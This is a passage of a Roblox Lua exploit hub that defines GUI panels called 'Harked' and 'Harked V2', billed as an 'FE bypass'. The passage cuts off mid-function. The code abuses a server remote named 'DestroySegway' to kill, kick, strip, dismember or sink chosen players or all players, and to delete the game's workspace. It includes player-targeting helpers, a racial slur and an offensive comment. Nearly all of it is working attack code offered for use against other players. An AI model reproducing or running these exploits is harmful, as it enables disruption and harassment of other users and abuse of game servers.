DoCommand('.'..button.Name:lower()..' '..target.Text) end end) end end end) local counter = (0) spawn(function() while wait(.5) do Main.BorderColor3 = Color3.fromHSV(math.acos(math.cos(counter*math.pi))/math.pi,(1),(1)) counter = (counter + (0.01)) end end) -- hi, im Whoo129 if you see me in a game end }) GUIS:AddButton({ Title = "Harked ", Description = "bypass fe", Callback = function() local main = Instance.new("ScreenGui") local top = Instance.new("Frame") local back = Instance.new("Frame") local kill = Instance.new("TextButton") local btools = Instance.new("TextButton") local top_2 = Instance.new("TextLabel") local naked = Instance.new("TextButton") local credits = Instance.new("TextLabel") local hatless = Instance.new("TextButton") local sink = Instance.new("TextButton") local nuke = Instance.new("TextButton") local kick = Instance.new("TextButton") local target = Instance.new("TextBox") local queue = Instance.new("TextLabel") local nolimbs = Instance.new("TextButton") --Properties: main.Name = "main" main.Parent = game:GetService("Players").LocalPlayer:WaitForChild("PlayerGui") top.Name = "top" top.Parent = main top.Draggable = true top.Active = true top.BackgroundColor3 = Color3.new(0.188235, 0.188235, 0.188235) top.BackgroundTransparency = 0.30000001192093 top.BorderColor3 = Color3.new(0.117647, 0.117647, 0.117647) top.Position = UDim2.new(0.612145662, 0, 0.311965823, 0) top.Size = UDim2.new(0, 291, 0, 30) back.Name = "back" back.Parent = top back.BackgroundColor3 = Color3.new(0.188235, 0.188235, 0.188235) back.BackgroundTransparency = 0.30000001192093 back.BorderColor3 = Color3.new(0.117647, 0.117647, 0.117647) back.BorderSizePixel = 0 back.Position = UDim2.new(-0.00343642617, 0, 1, 0) back.Size = UDim2.new(0, 293, 0, 293) kill.Name = "kill" kill.Parent = top kill.BackgroundColor3 = Color3.new(0.67451, 0.67451, 0.67451) kill.BackgroundTransparency = 0.5 kill.BorderSizePixel = 0 kill.Position = UDim2.new(0.0206185561, 0, 1.76666665, 0) kill.Size = UDim2.new(0, 134, 0, 40) kill.Font = Enum.Font.SourceSansLight kill.Text = "Kill" kill.TextColor3 = Color3.new(1, 1, 1) kill.TextSize = 23 btools.Name = "btools" btools.Parent = top btools.BackgroundColor3 = Color3.new(0.67451, 0.67451, 0.67451) btools.BackgroundTransparency = 0.5 btools.BorderSizePixel = 0 btools.Position = UDim2.new(0.525773168, 0, 1.76666665, 0) btools.Size = UDim2.new(0, 131, 0, 40) btools.Font = Enum.Font.SourceSansLight btools.Text = "Btools" btools.TextColor3 = Color3.new(1, 1, 1) btools.TextSize = 23 top_2.Name = "top" top_2.Parent = top top_2.BackgroundColor3 = Color3.new(1, 1, 1) top_2.BackgroundTransparency = 1 top_2.Position = UDim2.new(0.154639184, 0, -0.333333343, 0) top_2.Size = UDim2.new(0, 200, 0, 50) top_2.Font = Enum.Font.SourceSansLight top_2.Text = "Harked" top_2.TextColor3 = Color3.new(1, 1, 1) top_2.TextSize = 45 naked.Name = "naked" naked.Parent = top naked.BackgroundColor3 = Color3.new(0.67451, 0.67451, 0.67451) naked.BackgroundTransparency = 0.5 naked.BorderSizePixel = 0 naked.Position = UDim2.new(0.0206185561, 0, 3.56217241, 0) naked.Size = UDim2.new(0, 134, 0, 40) naked.Font = Enum.Font.SourceSansLight naked.Text = "Naked" naked.TextColor3 = Color3.new(1, 1, 1) naked.TextSize = 23 credits.Name = "credits" credits.Parent = top credits.BackgroundColor3 = Color3.new(1, 1, 1) credits.BackgroundTransparency = 1 credits.Position = UDim2.new(0, 0, 1, 0) credits.Size = UDim2.new(0, 291, 0, 23) credits.Font = Enum.Font.SourceSansLight credits.Text = "Commands/Scripts by Dong , UI by Unverified" credits.TextColor3 = Color3.new(1, 1, 1) credits.TextSize = 17 credits.TextWrapped = true hatless.Name = "hatless" hatless.Parent = top hatless.BackgroundColor3 = Color3.new(0.67451, 0.67451, 0.67451) hatless.BackgroundTransparency = 0.5 hatless.BorderSizePixel = 0 hatless.Position = UDim2.new(0.0206185561, 0, 5.39550591, 0) hatless.Size = UDim2.new(0, 134, 0, 40) hatless.Font = Enum.Font.SourceSansLight hatless.Text = "Hatless" hatless.TextColor3 = Color3.new(1, 1, 1) hatless.TextSize = 23 sink.Name = "sink" sink.Parent = top sink.BackgroundColor3 = Color3.new(0.67451, 0.67451, 0.67451) sink.BackgroundTransparency = 0.5 sink.BorderSizePixel = 0 sink.Position = UDim2.new(0.525773168, 0, 5.39550591, 0) sink.Size = UDim2.new(0, 131, 0, 40) sink.Font = Enum.Font.SourceSansLight sink.Text = "Sink" sink.TextColor3 = Color3.new(1, 1, 1) sink.TextSize = 23 nuke.Name = "nuke" nuke.Parent = top nuke.BackgroundColor3 = Color3.new(0.67451, 0.67451, 0.67451) nuke.BackgroundTransparency = 0.5 nuke.BorderSizePixel = 0 nuke.Position = UDim2.new(0.525773168, 0, 7.1955061, 0) nuke.Size = UDim2.new(0, 131, 0, 40) nuke.Font = Enum.Font.SourceSansLight nuke.Text = "Nuke" nuke.TextColor3 = Color3.new(1, 1, 1) nuke.TextSize = 23 kick.Name = "kick" kick.Parent = top kick.BackgroundColor3 = Color3.new(0.67451, 0.67451, 0.67451) kick.BackgroundTransparency = 0.5 kick.BorderSizePixel = 0 kick.Position = UDim2.new(0.0206185561, 0, 7.1955061, 0) kick.Size = UDim2.new(0, 134, 0, 40) kick.Font = Enum.Font.SourceSansLight kick.Text = "Kick" kick.TextColor3 = Color3.new(1, 1, 1) kick.TextSize = 23 target.Name = "target" target.Parent = top target.BackgroundColor3 = Color3.new(0.67451, 0.67451, 0.67451) target.BackgroundTransparency = 0.40000000596046 target.Position = UDim2.new(0.0206185561, 0, 8.86666584, 0) target.Size = UDim2.new(0, 278, 0, 33) target.Font = Enum.Font.SourceSans target.Text = "" target.TextColor3 = Color3.new(1, 1, 1) target.TextSize = 23 queue.Name = "queue" queue.Parent = top queue.BackgroundColor3 = Color3.new(1, 1, 1) queue.BackgroundTransparency = 1 queue.Position = UDim2.new(0.15463917, 0, 10.0333328, 0) queue.Size = UDim2.new(0, 201, 0, 23) queue.Font = Enum.Font.SourceSans queue.Text = "Replication Queue: 0" queue.TextColor3 = Color3.new(1, 0, 0.0156863) queue.TextSize = 20 queue.TextWrapped = true nolimbs.Name = "nolimbs" nolimbs.Parent = top nolimbs.BackgroundColor3 = Color3.new(0.67451, 0.67451, 0.67451) nolimbs.BackgroundTransparency = 0.5 nolimbs.BorderSizePixel = 0 nolimbs.Position = UDim2.new(0.525773168, 0, 3.56217265, 0) nolimbs.Size = UDim2.new(0, 131, 0, 40) nolimbs.Font = Enum.Font.SourceSansLight nolimbs.Text = "NoLimbs" nolimbs.TextColor3 = Color3.new(1, 1, 1) nolimbs.TextSize = 23 -- SLAVE'S WORK -- for i,slaves in pairs(game:GetDescendants()) do if slaves.Name == "DestroySegway" then print("no u") kill.MouseButton1Down:connect(function() if string.lower(target.Text) == "all" then for i,c in pairs(game:GetService("Players"):GetPlayers()) do ohok = c.Character["Head"] slaves:FireServer(ohok, {Value = ohok}) end else if game:GetService("Players"):FindFirstChild(target.Text) then if game:GetService("Players"):FindFirstChild(target.Text).Character then slaves:FireServer(game:GetService("Players"):FindFirstChild(target.Text).Character.Head, {Value = game:GetService("Players"):FindFirstChild(target.Text).Character.Head}) else print("nibba who this") end end end end) btools.MouseButton1Down:connect(function() local Tool = Instance.new("Tool",game:GetService("Players").LocalPlayer.Backpack) local Equipped = false Tool.RequiresHandle = false Tool.Name = "Destroy Tool" local Field = Instance.new("SelectionBox",game:GetService("Workspace")) local Mouse = game:GetService("Players").LocalPlayer:GetMouse() Field.LineThickness = 0.1 Tool.Equipped:connect(function() Equipped = true while Equipped == true do if Mouse.Target ~= nil then Field.Adornee = Mouse.Target else Field.Adornee = nil end wait() end end) Tool.Unequipped:connect(function() Equipped = false Field.Adornee = nil end) Tool.Activated:connect(function() if Mouse.Target ~= nil then slaves:FireServer(Mouse.Target, {Value = Mouse.Target}) local AttemptTarget = Mouse.Target while AttemptTarget ~= nil do AttemptTarget.Velocity = Vector3.new(0,-1000000000000000,0) AttemptTarget.CanCollide = false wait() end end end) end) naked.MouseButton1Down:connect(function() if string.lower(target.Text) == "all" then for i,c in pairs(game:GetService("Players"):GetPlayers()) do ohok = c.Character.Shirt ohoka = c.Character.Pants slaves:FireServer(ohok, {Value = ohok}) slaves:FireServer(ohoka, {Value = ohoka}) end else slaves:FireServer(game:GetService("Players"):FindFirstChild(target.Text).Character.Shirt, {Value = game:GetService("Players"):FindFirstChild(target.Text).Character.Shirt}) slaves:FireServer(game:GetService("Players"):FindFirstChild(target.Text).Character.Pants, {Value = game:GetService("Players"):FindFirstChild(target.Text).Character.Pants}) end end) nolimbs.MouseButton1Down:connect(function() if string.lower(target.Text) == "all" then for i,c in pairs(game:GetService("Players"):GetPlayers()) do ohok = c.Character["Right Arm"] ohoka = c.Character["Left Arm"] ohokb = c.Character["Right Leg"] ohokc = c.Character["Left Leg"] slaves:FireServer(ohok, {Value = ohok}) slaves:FireServer(ohoka, {Value = ohoka}) slaves:FireServer(ohokb, {Value = ohokb}) slaves:FireServer(ohokc, {Value = ohokc}) end else slaves:FireServer(game:GetService("Players"):FindFirstChild(target.Text).Character["Right Arm"], {Value = game:GetService("Players"):FindFirstChild(target.Text).Character["Right Arm"]}) slaves:FireServer(game:GetService("Players"):FindFirstChild(target.Text).Character["Right Leg"], {Value = game:GetService("Players"):FindFirstChild(target.Text).Character["Right Leg"]}) slaves:FireServer(game:GetService("Players"):FindFirstChild(target.Text).Character["Left Arm"], {Value = game:GetService("Players"):FindFirstChild(target.Text).Character["Left Arm"]}) slaves:FireServer(game:GetService("Players"):FindFirstChild(target.Text).Character["Left Leg"], {Value = game:GetService("Players"):FindFirstChild(target.Text).Character["Left Leg"]}) end end) hatless.MouseButton1Down:connect(function() if string.lower(target.Text) == "all" then for i,x in pairs(game:GetService("Players"):GetPlayers()) do for i,c in pairs(x.Character:GetChildren()) do if c:IsA("Accessory") then ohok = c slaves:FireServer(ohok, {Value = ohok}) end end end else for i, hats in pairs(game:GetService("Players"):FindFirstChild(target.Text).Character:GetChildren()) do if hats:IsA("Accessory") then slaves:FireServer(hats, {Value = hats }) end end end end) sink.MouseButton1Down:connect(function() if string.lower(target.Text) == "all" then for i,c in pairs(game:GetService("Players"):GetPlayers()) do ohok = c.Character.HumanoidRootPart slaves:FireServer(ohok, {Value = ohok}) end else slaves:FireServer(game:GetService("Players"):FindFirstChild(target.Text).Character["HumanoidRootPart"], {Value = game:GetService("Players"):FindFirstChild(target.Text).Character["HumanoidRootPart"]}) end end) kick.MouseButton1Down:connect(function() if string.lower(target.Text) == "all" then for i,c in pairs(game:GetService("Players"):GetPlayers()) do ohok = c slaves:FireServer(ohok, {Value = ohok}) end else slaves:FireServer(game:GetService("Players"):FindFirstChild(target.Text), {Value = game:GetService("Players"):FindFirstChild(target.Text)}) end end) nuke.MouseButton1Down:connect(function() for i,c in pairs(game:GetService("Workspace"):GetChildren()) do ohok = c slaves:FireServer(ohok, {Value = ohok}) end end) end end end }) GUIS:AddButton({ Title = "Harked 2", Description = "Harked 2", Callback = function() local main = Instance.new("ScreenGui") local top = Instance.new("Frame") local back = Instance.new("Frame") local kill = Instance.new("TextButton") local btools = Instance.new("TextButton") local top_2 = Instance.new("TextLabel") local naked = Instance.new("TextButton") local credits = Instance.new("TextLabel") local hatless = Instance.new("TextButton") local sink = Instance.new("TextButton") local nuke = Instance.new("TextButton") local kick = Instance.new("TextButton") local target = Instance.new("TextBox") local queue = Instance.new("TextLabel") local nolimbs = Instance.new("TextButton") --Properties: main.Name = "main" main.Parent = game:GetService("Players").LocalPlayer:WaitForChild("PlayerGui") top.Name = "top" top.Parent = main top.Draggable = true top.Active = true top.BackgroundColor3 = Color3.new(0.188235, 0.188235, 0.188235) top.BackgroundTransparency = 0.30000001192093 top.BorderColor3 = Color3.new(0.117647, 0.117647, 0.117647) top.Position = UDim2.new(0.612145662, 0, 0.311965823, 0) top.Size = UDim2.new(0, 291, 0, 30) back.Name = "back" back.Parent = top back.BackgroundColor3 = Color3.new(0.188235, 0.188235, 0.188235) back.BackgroundTransparency = 0.30000001192093 back.BorderColor3 = Color3.new(0.117647, 0.117647, 0.117647) back.BorderSizePixel = 0 back.Position = UDim2.new(-0.00343642617, 0, 1, 0) back.Size = UDim2.new(0, 293, 0, 293) kill.Name = "kill" kill.Parent = top kill.BackgroundColor3 = Color3.new(0.67451, 0.67451, 0.67451) kill.BackgroundTransparency = 0.5 kill.BorderSizePixel = 0 kill.Position = UDim2.new(0.0206185561, 0, 1.76666665, 0) kill.Size = UDim2.new(0, 134, 0, 40) kill.Font = Enum.Font.SourceSansLight kill.Text = "Kill" kill.TextColor3 = Color3.new(1, 1, 1) kill.TextSize = 23 btools.Name = "btools" btools.Parent = top btools.BackgroundColor3 = Color3.new(0.67451, 0.67451, 0.67451) btools.BackgroundTransparency = 0.5 btools.BorderSizePixel = 0 btools.Position = UDim2.new(0.525773168, 0, 1.76666665, 0) btools.Size = UDim2.new(0, 131, 0, 40) btools.Font = Enum.Font.SourceSansLight btools.Text = "Btools" btools.TextColor3 = Color3.new(1, 1, 1) btools.TextSize = 23 top_2.Name = "top" top_2.Parent = top top_2.BackgroundColor3 = Color3.new(1, 1, 1) top_2.BackgroundTransparency = 1 top_2.Position = UDim2.new(0.154639184, 0, -0.333333343, 0) top_2.Size = UDim2.new(0, 200, 0, 50) top_2.Font = Enum.Font.SourceSansLight top_2.Text = "Harked" top_2.TextColor3 = Color3.new(1, 1, 1) top_2.TextSize = 45 naked.Name = "naked" naked.Parent = top naked.BackgroundColor3 = Color3.new(0.67451, 0.67451, 0.67451) naked.BackgroundTransparency = 0.5 naked.BorderSizePixel = 0 naked.Position = UDim2.new(0.0206185561, 0, 3.56217241, 0) naked.Size = UDim2.new(0, 134, 0, 40) naked.Font = Enum.Font.SourceSansLight naked.Text = "Naked" naked.TextColor3 = Color3.new(1, 1, 1) naked.TextSize = 23 credits.Name = "credits" credits.Parent = top credits.BackgroundColor3 = Color3.new(1, 1, 1) credits.BackgroundTransparency = 1 credits.Position = UDim2.new(0, 0, 1, 0) credits.Size = UDim2.new(0, 291, 0, 23) credits.Font = Enum.Font.SourceSansLight credits.Text = "Commands/Scripts by Dong , UI by Unverified" credits.TextColor3 = Color3.new(1, 1, 1) credits.TextSize = 17 credits.TextWrapped = true hatless.Name = "hatless" hatless.Parent = top hatless.BackgroundColor3 = Color3.new(0.67451, 0.67451, 0.67451) hatless.BackgroundTransparency = 0.5 hatless.BorderSizePixel = 0 hatless.Position = UDim2.new(0.0206185561, 0, 5.39550591, 0) hatless.Size = UDim2.new(0, 134, 0, 40) hatless.Font = Enum.Font.SourceSansLight hatless.Text = "Hatless" hatless.TextColor3 = Color3.new(1, 1, 1) hatless.TextSize = 23 sink.Name = "sink" sink.Parent = top sink.BackgroundColor3 = Color3.new(0.67451, 0.67451, 0.67451) sink.BackgroundTransparency = 0.5 sink.BorderSizePixel = 0 sink.Position = UDim2.new(0.525773168, 0, 5.39550591, 0) sink.Size = UDim2.new(0, 131, 0, 40) sink.Font = Enum.Font.SourceSansLight sink.Text = "Sink" sink.TextColor3 = Color3.new(1, 1, 1) sink.TextSize = 23 nuke.Name = "nuke" nuke.Parent = top nuke.BackgroundColor3 = Color3.new(0.67451, 0.67451, 0.67451) nuke.BackgroundTransparency = 0.5 nuke.BorderSizePixel = 0 nuke.Position = UDim2.new(0.525773168, 0, 7.1955061, 0) nuke.Size = UDim2.new(0, 131, 0, 40) nuke.Font = Enum.Font.SourceSansLight nuke.Text = "Nuke" nuke.TextColor3 = Color3.new(1, 1, 1) nuke.TextSize = 23 kick.Name = "kick" kick.Parent = top kick.BackgroundColor3 = Color3.new(0.67451, 0.67451, 0.67451) kick.BackgroundTransparency = 0.5 kick.BorderSizePixel = 0 kick.Position = UDim2.new(0.0206185561, 0, 7.1955061, 0) kick.Size = UDim2.new(0, 134, 0, 40) kick.Font = Enum.Font.SourceSansLight kick.Text = "Kick" kick.TextColor3 = Color3.new(1, 1, 1) kick.TextSize = 23 target.Name = "target" target.Parent = top target.BackgroundColor3 = Color3.new(0.67451, 0.67451, 0.67451) target.BackgroundTransparency = 0.40000000596046 target.Position = UDim2.new(0.0206185561, 0, 8.86666584, 0) target.Size = UDim2.new(0, 278, 0, 33) target.Font = Enum.Font.SourceSans target.Text = "" target.TextColor3 = Color3.new(1, 1, 1) target.TextSize = 23 queue.Name = "queue" queue.Parent = top queue.BackgroundColor3 = Color3.new(1, 1, 1) queue.BackgroundTransparency = 1 queue.Position = UDim2.new(0.15463917, 0, 10.0333328, 0) queue.Size = UDim2.new(0, 201, 0, 23) queue.Font = Enum.Font.SourceSans queue.Text = "Replication Queue: 0" queue.TextColor3 = Color3.new(1, 0, 0.0156863) queue.TextSize = 20 queue.TextWrapped = true nolimbs.Name = "nolimbs" nolimbs.Parent = top nolimbs.BackgroundColor3 = Color3.new(0.67451, 0.67451, 0.67451) nolimbs.BackgroundTransparency = 0.5 nolimbs.BorderSizePixel = 0 nolimbs.Position = UDim2.new(0.525773168, 0, 3.56217265, 0) nolimbs.Size = UDim2.new(0, 131, 0, 40) nolimbs.Font = Enum.Font.SourceSansLight nolimbs.Text = "NoLimbs" nolimbs.TextColor3 = Color3.new(1, 1, 1) nolimbs.TextSize = 23 -- SLAVE'S WORK -- for i,slaves in pairs(game:GetDescendants()) do if slaves.Name == "DestroySegway" then print("no u") kill.MouseButton1Down:connect(function() if string.lower(target.Text) == "all" then for i,c in pairs(game:GetService("Players"):GetPlayers()) do ohok = c.Character["Head"] slaves:FireServer(ohok, {Value = ohok}) end else if game:GetService("Players"):FindFirstChild(target.Text) then if game:GetService("Players"):FindFirstChild(target.Text).Character then slaves:FireServer(game:GetService("Players"):FindFirstChild(target.Text).Character.Head, {Value = game:GetService("Players"):FindFirstChild(target.Text).Character.Head}) else print("nibba who this") end end end end) btools.MouseButton1Down:connect(function() local Tool = Instance.new("Tool",game:GetService("Players").LocalPlayer.Backpack) local Equipped = false Tool.RequiresHandle = false Tool.Name = "Destroy Tool" local Field = Instance.new("SelectionBox",game:GetService("Workspace")) local Mouse = game:GetService("Players").LocalPlayer:GetMouse() Field.LineThickness = 0.1 Tool.Equipped:connect(function() Equipped = true while Equipped == true do if Mouse.Target ~= nil then Field.Adornee = Mouse.Target else Field.Adornee = nil end wait() end end) Tool.Unequipped:connect(function() Equipped = false Field.Adornee = nil end) Tool.Activated:connect(function() if Mouse.Target ~= nil then slaves:FireServer(Mouse.Target, {Value = Mouse.Target}) local AttemptTarget = Mouse.Target while AttemptTarget ~= nil do AttemptTarget.Velocity = Vector3.new(0,-1000000000000000,0) AttemptTarget.CanCollide = false wait() end end end) end) naked.MouseButton1Down:connect(function() if string.lower(target.Text) == "all" then for i,c in pairs(game:GetService("Players"):GetPlayers()) do ohok = c.Character.Shirt ohoka = c.Character.Pants slaves:FireServer(ohok, {Value = ohok}) slaves:FireServer(ohoka, {Value = ohoka}) end else slaves:FireServer(game:GetService("Players"):FindFirstChild(target.Text).Character.Shirt, {Value = game:GetService("Players"):FindFirstChild(target.Text).Character.Shirt}) slaves:FireServer(game:GetService("Players"):FindFirstChild(target.Text).Character.Pants, {Value = game:GetService("Players"):FindFirstChild(target.Text).Character.Pants}) end end) nolimbs.MouseButton1Down:connect(function() if string.lower(target.Text) == "all" then for i,c in pairs(game:GetService("Players"):GetPlayers()) do ohok = c.Character["Right Arm"] ohoka = c.Character["Left Arm"] ohokb = c.Character["Right Leg"] ohokc = c.Character["Left Leg"] slaves:FireServer(ohok, {Value = ohok}) slaves:FireServer(ohoka, {Value = ohoka}) slaves:FireServer(ohokb, {Value = ohokb}) slaves:FireServer(ohokc, {Value = ohokc}) end else slaves:FireServer(game:GetService("Players"):FindFirstChild(target.Text).Character["Right Arm"], {Value = game:GetService("Players"):FindFirstChild(target.Text).Character["Right Arm"]}) slaves:FireServer(game:GetService("Players"):FindFirstChild(target.Text).Character["Right Leg"], {Value = game:GetService("Players"):FindFirstChild(target.Text).Character["Right Leg"]}) slaves:FireServer(game:GetService("Players"):FindFirstChild(target.Text).Character["Left Arm"], {Value = game:GetService("Players"):FindFirstChild(target.Text).Character["Left Arm"]}) slaves:FireServer(game:GetService("Players"):FindFirstChild(target.Text).Character["Left Leg"], {Value = game:GetService("Players"):FindFirstChild(target.Text).Character["Left Leg"]}) end end) hatless.MouseButton1Down:connect(function() if string.lower(target.Text) == "all" then for i,x in pairs(game:GetService("Players"):GetPlayers()) do for i,c in pairs(x.Character:GetChildren()) do if c:IsA("Accessory") then ohok = c slaves:FireServer(ohok, {Value = ohok}) end end end else for i, hats in pairs(game:GetService("Players"):FindFirstChild(target.Text).Character:GetChildren()) do if hats:IsA("Accessory") then slaves:FireServer(hats, {Value = hats }) end end end end) sink.MouseButton1Down:connect(function() if string.lower(target.Text) == "all" then for i,c in pairs(game:GetService("Players"):GetPlayers()) do ohok = c.Character.HumanoidRootPart slaves:FireServer(ohok, {Value = ohok}) end else slaves:FireServer(game:GetService("Players"):FindFirstChild(target.Text).Character["HumanoidRootPart"], {Value = game:GetService("Players"):FindFirstChild(target.Text).Character["HumanoidRootPart"]}) end end) kick.MouseButton1Down:connect(function() if string.lower(target.Text) == "all" then for i,c in pairs(game:GetService("Players"):GetPlayers()) do ohok = c slaves:FireServer(ohok, {Value = ohok}) end else slaves:FireServer(game:GetService("Players"):FindFirstChild(target.Text), {Value = game:GetService("Players"):FindFirstChild(target.Text)}) end end) nuke.MouseButton1Down:connect(function() for i,c in pairs(game:GetService("Workspace"):GetChildren()) do ohok = c slaves:FireServer(ohok, {Value = ohok}) end end) end end end }) GUIS:AddButton({ Title = "Harked V2", Description = "Harked V2", Callback = function() --[[ https://www.roblox.com/games/3554069044/Live-Life-Rich-and-Famous-in-Paradise?AssetId=3554069044 ]] local main = Instance.new("ScreenGui") local top = Instance.new("Frame") local back = Instance.new("Frame") local ScrollingFrame = Instance.new("ScrollingFrame") local bald = Instance.new("TextButton") local ragdoll = Instance.new("TextButton") local kill = Instance.new("TextButton") local naked = Instance.new("TextButton") local goto = Instance.new("TextButton") local rtools = Instance.new("TextButton") local box = Instance.new("TextButton") local sink = Instance.new("TextButton") local ban = Instance.new("TextButton") local explorer = Instance.new("TextButton") local slock = Instance.new("TextButton") local UIGridLayout = Instance.new("UIGridLayout") local kick = Instance.new("TextButton") local blockhead = Instance.new("TextButton") local stools = Instance.new("TextButton") local noface = Instance.new("TextButton") local punish = Instance.new("TextButton") local pantsless = Instance.new("TextButton") local shirtless = Instance.new("TextButton") local tshirtless = Instance.new("TextButton") local noregen = Instance.new("TextButton") local stopanim = Instance.new("TextButton") local blockchar = Instance.new("TextButton") local nolimbs = Instance.new("TextButton") local nola = Instance.new("TextButton") local noll = Instance.new("TextButton") local nora = Instance.new("TextButton") local norl = Instance.new("TextButton") local nowaist = Instance.new("TextButton") local noroot = Instance.new("TextButton") local top_2 = Instance.new("TextLabel") local credits = Instance.new("TextLabel") local queue = Instance.new("TextLabel") local target = Instance.new("TextBox") local Players = game:GetService("Players") function splitString(str,delim) local broken = {} if delim == nil then delim = "," end for w in string.gmatch(str,"[^"..delim.."]+") do table.insert(broken,w) end return broken end function toTokens(str) local tokens = {} for op,name in string.gmatch(str,"([+-])([^+-]+)") do table.insert(tokens,{Operator = op,Name = name}) end return tokens end function getRoot(char) local rootPart = char:FindFirstChild('HumanoidRootPart') or char:FindFirstChild('Torso') or char:FindFirstChild('UpperTorso') return rootPart end local WTS = function(Object) local ObjectVector = game:GetService("Workspace").CurrentCamera:WorldToScreenPoint(Object.Position) return Vector2.new(ObjectVector.X, ObjectVector.Y) end local mouse = Players.LocalPlayer:GetMouse() local MousePositionToVector2 = function() return Vector2.new(mouse.X, mouse.Y) end local GetClosestPlayerFromCursor = function() local found = nil local ClosestDistance = math.huge for i, v in pairs(Players:GetPlayers()) do if v ~= Players.LocalPlayer and v.Character and v.Character:FindFirstChildOfClass("Humanoid") then for k, x in pairs(v.Character:GetChildren()) do if string.find(x.Name, "Torso") then local Distance = (WTS(x) - MousePositionToVector2()).Magnitude if Distance < ClosestDistance then ClosestDistance = Distance found = v end end end end end return found end local SpecialPlayerCases = { ["all"] = function(speaker) return Players:GetPlayers() end, ["others"] = function(speaker) local plrs = {} for i,v in pairs(Players:GetPlayers()) do if v ~= speaker then table.insert(plrs,v) end end return plrs end, ["me"] = function(speaker)return {speaker} end, ["#(%d+)"] = function(speaker,args,currentList) local returns = {} local randAmount = tonumber(args[1]) local players = {unpack(currentList)} for i = 1,randAmount do if #players == 0 then break end local randIndex = math.random(1,#players) table.insert(returns,players[randIndex]) table.remove(players,randIndex) end return returns end, ["random"] = function(speaker,args,currentList) local players = Players:GetPlayers() local localplayer = Players.LocalPlayer table.remove(players, table.find(players, localplayer)) return {players[math.random(1,#players)]} end, ["%%(.+)"] = function(speaker,args) local returns = {} local team = args[1] for _,plr in pairs(Players:GetPlayers()) do if plr.Team and string.sub(string.lower(plr.Team.Name),1,#team) == string.lower(team) then table.insert(returns,plr) end end return returns end, ["allies"] = function(speaker) local returns = {} local team = speaker.Team for _,plr in pairs(Players:GetPlayers()) do if plr.Team == team then table.insert(returns,plr) end end return returns end, ["enemies"] = function(speaker) local returns = {} local team = speaker.Team for _,plr in pairs(Players:GetPlayers()) do if plr.Team ~= team then table.insert(returns,plr) end end return returns end, ["team"] = function(speaker) local returns = {} local team = speaker.Team for _,plr in pairs(Players:GetPlayers()) do if plr.Team == team then table.insert(returns,plr) end end return returns end, ["nonteam"] = function(speaker) local returns = {} local team = speaker.Team for _,plr in pairs(Players:GetPlayers()) do if plr.Team ~= team then table.insert(returns,plr) end end return returns end, ["friends"] = function(speaker,args) local returns = {} for _,plr in pairs(Players:GetPlayers()) do if plr:IsFriendsWith(speaker.UserId) and plr ~= speaker then table.insert(returns,plr) end end return returns end, ["nonfriends"] = function(speaker,args) local returns = {} for _,plr in pairs(Players:GetPlayers()) do if not plr:IsFriendsWith(speaker.UserId) and plr ~= speaker then table.insert(returns,plr) end end return returns end, ["guests"] = function(speaker,args) local returns = {} for _,plr in pairs(Players:GetPlayers()) do if plr.Guest then table.insert(returns,plr) end end return returns end, ["bacons"] = function(speaker,args) local returns = {} for _,plr in pairs(Players:GetPlayers()) do if plr.Character:FindFirstChild('Pal Hair') or plr.Character:FindFirstChild('Kate Hair') then table.insert(returns,plr) end end return returns end, ["age(%d+)"] = function(speaker,args) local returns = {} local age = tonumber(args[1]) if not age == nil then return end for _,plr in pairs(Players:GetPlayers()) do if plr.AccountAge <= age then table.insert(returns,plr) end end return returns end, ["nearest"] = function(speaker,args,currentList) local speakerChar = speaker.Character if not speakerChar or not getRoot(speakerChar) then return end local lowest = math.huge local NearestPlayer = nil for _,plr in pairs(currentList) do if plr ~= speaker and plr.Character then local distance = plr:DistanceFromCharacter(getRoot(speakerChar).Position) if distance < lowest then lowest = distance NearestPlayer = {plr} end end end return NearestPlayer end, ["farthest"] = function(speaker,args,currentList) local speakerChar = speaker.Character if not speakerChar or not getRoot(speakerChar) then return end local highest = 0 local Farthest = nil for _,plr in pairs(currentList) do if plr ~= speaker and plr.Character then local distance = plr:DistanceFromCharacter(getRoot(speakerChar).Position) if distance > highest then highest = distance Farthest = {plr} end end end return Farthest end, ["group(%d+)"] = function(speaker,args) local returns = {} local groupID = tonumber(args[1]) for _,plr in pairs(Players:GetPlayers()) do if plr:IsInGroup(groupID) then table.insert(returns,plr) end end return returns end, ["alive"] = function(speaker,args) local returns = {} for _,plr in pairs(Players:GetPlayers()) do if plr.Character and plr.Character:FindFirstChildOfClass("Humanoid") and plr.Character:FindFirstChildOfClass("Humanoid").Health > 0 then table.insert(returns,plr) end end return returns end, ["dead"] = function(speaker,args) local returns = {} for _,plr in pairs(Players:GetPlayers()) do if (not plr.Character or not plr.Character:FindFirstChildOfClass("Humanoid")) or plr.Character:FindFirstChildOfClass("Humanoid").Health <= 0 then table.insert(returns,plr) end end return returns end, ["rad(%d+)"] = function(speaker,args) local returns = {} local radius = tonumber(args[1]) local speakerChar = speaker.Character if not speakerChar or not getRoot(speakerChar) then return end for _,plr in pairs(Players:GetPlayers()) do if plr.Character and getRoot(plr.Character) then local magnitude = (getRoot(plr.Character).Position-getRoot(speakerChar).Position).magnitude if magnitude <= radius then table.insert(returns,plr) end end end return returns end, ["cursor"] = function(speaker) local plrs = {} local v = GetClosestPlayerFromCursor() if v ~= nil then table.insert(plrs, v) end return plrs end, } function onlyIncludeInTable(tab,matches) local matchTable = {} local resultTable = {} for i,v in pairs(matches) do matchTable[v.Name] = true end for i,v in pairs(tab) do if matchTable[v.Name] then table.insert(resultTable,v) end end return resultTable end function removeTableMatches(tab,matches) local matchTable = {} local resultTable = {} for i,v in pairs(matches) do matchTable[v.Name] = true end for i,v in pairs(tab) do if not matchTable[v.Name] then table.insert(resultTable,v) end end return resultTable end function getPlayersByName(Name) local Name,Len,Found = string.lower(Name),#Name,{} for _,v in pairs(Players:GetPlayers()) do if Name:sub(0,1) == '@' then if string.sub(string.lower(v.Name),1,Len-1) == Name:sub(2) then table.insert(Found,v) end else if string.sub(string.lower(v.Name),1,Len) == Name or string.sub(string.lower(v.DisplayName),1,Len) == Name then table.insert(Found,v) end end end return Found end function getPlayer(list,speaker) if list == nil then return {speaker.Name} end local nameList = splitString(list,",") local foundList = {} for _,name in pairs(nameList) do if string.sub(name,1,1) ~= "+" and string.sub(name,1,1) ~= "-" then name = "+"..name end local tokens = toTokens(name) local initialPlayers = Players:GetPlayers() for i,v in pairs(tokens) do if v.Operator == "+" then local tokenContent = v.Name local foundCase = false for regex,case in pairs(SpecialPlayerCases) do local matches = {string.match(tokenContent,"^"..regex.."$")} if #matches > 0 then foundCase = true initialPlayers = 